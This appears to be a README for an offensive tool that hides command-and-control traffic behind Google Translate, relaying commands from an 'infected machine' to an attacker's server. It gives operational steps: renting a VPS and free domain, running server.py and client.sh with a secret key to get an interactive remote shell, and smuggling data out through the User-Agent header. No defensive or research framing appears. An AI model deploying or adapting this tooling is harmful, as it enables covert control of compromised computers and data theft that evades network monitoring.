This tools uses Google Translator as a proxy to send arbitrary commands to an infected machine.
[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
First you need a VPS and a domain, for the domain you can get a free one on Freenom. With your VPS and domain, just edit the client script, and set your domain on line 5.
Start the server.py on your VPS
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062It will provide you secret key which will be used on the client.sh, run the client on a computer with access to Google Translator, providing the secret key generated by the server.
bash client.sh e294a11e-bb6f-49ed-b03a-9ec42be55062Now you have an interactive shell using named pipe files, YES you can cd into directories.
Google translate does not forward POST data, so there's a limit on the amount of data that your server can receive, for example, you'll probably not being able to read a big file like.bashrc.Problem fixed using User-Agent header to sent data.- It's not a problem, but I just don't know if there's a rate limit on Google Translator
- The client script works on Mac an Linux, but on Linux you need to install the
xmllintwhich is onlibxml2-utils